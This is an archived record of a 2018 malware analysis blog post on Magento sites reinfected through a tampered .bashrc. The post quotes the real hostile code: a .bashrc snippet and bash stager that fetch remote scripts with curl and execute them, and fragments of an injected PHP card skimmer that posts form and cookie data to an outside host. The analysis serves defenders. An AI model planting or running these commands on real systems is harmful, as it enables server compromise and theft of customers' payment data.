{
	"id": "79867782-3d27-464e-af46-f16c58ca9ac0",
	"created_at": "2026-04-06T00:06:55.641076Z",
	"updated_at": "2026-04-10T03:21:44.096215Z",
	"deleted_at": null,
	"sha1_hash": "6feca9b111c2235f2aa6316d08eb146a7ec8db21",
	"title": "Shell Logins as a Magento Reinfection Vector",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 84658,
	"plain_text": "Shell Logins as a Magento Reinfection Vector\r\nBy Cesar Anjos\r\nPublished: 2018-05-31 · Archived: 2026-04-05 16:39:58 UTC\r\nRecently, we have come across a number of websites that were facing reinfection of a credit card information stealer malware within the following files:\r\napp/Mage.php;\r\nlib/Varien/Autoload.php;\r\nindex.php;\r\napp/code/core/Mage/Core/functions.php;\r\nThese are common files for attackers to target as they operate throughout Magento sites, but these instances were special as they had a very peculiar reinfection rate.\r\nMalicious Scripts Loaded Through .bashrc\r\nUpon closer inspection, we came across this snippet in the site owner’s .bashrc file. A .bashrc file is a script that runs whenever a user logs into their *nix account locally or through SSH. As seen below, any command can be added there:\r\n# .bashrc\r\n# Source global definitions\r\nif [ -f /etc/bashrc ]; then\r\n. /etc/bashrc\r\nfi\r\n# Uncomment the following line if you don't like systemctl's auto-paging feature:\r\n# export SYSTEMD_PAGER=\r\n# User specific aliases and functions\r\nchecks=$(ps aux | grep php-fpm | grep -v grep | grep tmp);\r\nif [ \"$checks\" == \"\" ]; then\r\n rm -rf /tmp/.a /tmp/start_6457387765553057055;\r\n if ! [ -f /tmp/php-fpm ]; then\r\n curl -qs javascloud[.]com/victim_install.js \u003e /tmp/php-fpm;\r\n chmod +x /tmp/php-fpm;\r\n fi\r\n /bin/sh /tmp/php-fpm \u003e /dev/null 2\u003e\u00261 \u0026\r\nfi\r\nOne point worth noting is that the name of the file being pulled (victim_install.js) varies depending on the target, where victim is the domain name of the victim’s site.\r\nFor a quick rundown of what is going on, each time the server account owner logs in and an interactive shell session starts, the file javascloud[.]com/victim_install.js is fetched and written to /tmp/php-fpm, which is then executed.\r\nInfected Files and Credit Card Stealers\r\nHere’s an example of the content in the javascloud[.]com/victim_install.js file:\r\n#!/bin/bash\r\nif [ -f /tmp/.a ]; then\r\n exit;\r\nfi\r\ntouch /tmp/.a\r\nif ! [ -f /tmp/zend_cache---Zend_LocaleC_en_US_bb ]; then\r\n curl -q javascloud[.]com/victim_daemon.js \u003e /tmp/zend_cache---Zend_LocaleC_en_US_bb\r\nfi\r\nphp -f /tmp/zend_cache---Zend_LocaleC_en_US_bb\r\nsleep 60\r\nrm -rf /tmp/.a\r\n/bin/sh /tmp/php-fpm \u003e /dev/null 2\u003e\u00261 \u0026\r\nexit;\r\nAs you can see, another file, javascloud[.]com/victim_daemon.js, is obtained and placed at /tmp/zend_cache---Zend_LocaleC_en_US_bb, which is then executed through the php binary.\r\nThis last file is the final step that brings the credit card stealer onto the website and is used to infect the files mentioned at the top.\r\nFrom this last file we can see the indicators of what files and areas the infection is targeting:\r\n$fileList = array('app/Mage.php','lib/Varien/Autoload.php','index.php','app/code/core/Mage/Core/funct\r\n$patternSearchFile = array('Varien_Autoload::register();','class Varien_Autoload', 'umask(0);', 'func\r\nOnce a pattern matches, the following code is injected into that location:\r\nif (preg_match(\"/\".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ\r\n@exec(\"curl --data \\\"version=1\u0026encode=\".base64_encode( serialize($_POST) . \"--\" . serialize($_COOK\r\nThis is it now as a decoded version:\r\nAll the confidential payment information inputted on the website is submitted to http://verpayment[.]com/testServer.php.\r\nConclusion\r\nThis may not be a very common reinfection method, but it is effective when the only available mechanism to manage the files is SFTP. It is extremely uncommon to see site reinfections triggered just by starting an interactive shell session. However, this is what the malicious code in the .bashrc does, and the file is executed whenever a site owner logs into their server account using SSH or SFTP. This file is typically located above the root directory of the site. Moreover, it is “hidden” and FTP managers don’t show it by default. Even the “ls” command requires an additional “-a” flag to show such files.\r\nWhen dealing with website malware, we need to keep in mind that not only the website files/database can contain malware; any part of the chain – from the server config down to the website – is a point of risk.\r\nThe best way to mitigate this type of infection is to properly secure your SSH account and improve your security posture. If you believe that your Magento website has been compromised or you are struggling with website reinfections, we can help.\r\nUpdate: We have just released a Magento security guide. Check it out!\r\nCesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.\r\nRelated Tags\r\nBlack Hat Tactics,\r\nHacked Websites\r\nSource: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html"
	],
	"report_names": [
		"shell-logins-as-a-magento-reinfection-vector.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434015,
	"ts_updated_at": 1775791304,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6feca9b111c2235f2aa6316d08eb146a7ec8db21.pdf",
		"text": "https://archive.orkl.eu/6feca9b111c2235f2aa6316d08eb146a7ec8db21.txt",
		"img": "https://archive.orkl.eu/6feca9b111c2235f2aa6316d08eb146a7ec8db21.jpg"
	}
}